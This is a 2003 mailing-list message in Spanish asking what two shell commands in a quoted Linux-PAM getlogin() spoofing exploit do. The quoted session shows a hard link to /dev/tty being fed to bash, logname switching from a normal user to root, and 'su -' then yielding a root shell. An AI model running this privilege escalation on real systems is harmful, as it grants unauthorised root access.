[eside-ghost] Linux-PAM getlogin() Spoofing Vulnerability

Jose Ignacio Sanchez Martin eside-ghost@deusto.es
Thu, 19 Jun 2003 11:56:50 +0200

Previous message: [eside-ghost] Linux-PAM getlogin() Spoofing Vulnerability
Next message: [eside-ghost] Linux-PAM getlogin() Spoofing Vulnerability
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Mnnn no entiendo el exploit. Que hacen exactamente estas 2 ordenes?

$ ln /dev/tty tty1
$ bash < tty1

Alguien que lo explique?

At 09:10 AM 6/19/2003 +0200, you wrote:
>$ logname
>farmer
>
>$ ln /dev/tty tty1
>$ bash < tty1
>
>$ logname
>root
>
>$ su -
># id
>uid=0(root) gid=0(root)
>groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Previous message: [eside-ghost] Linux-PAM getlogin() Spoofing Vulnerability
Next message: [eside-ghost] Linux-PAM getlogin() Spoofing Vulnerability
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]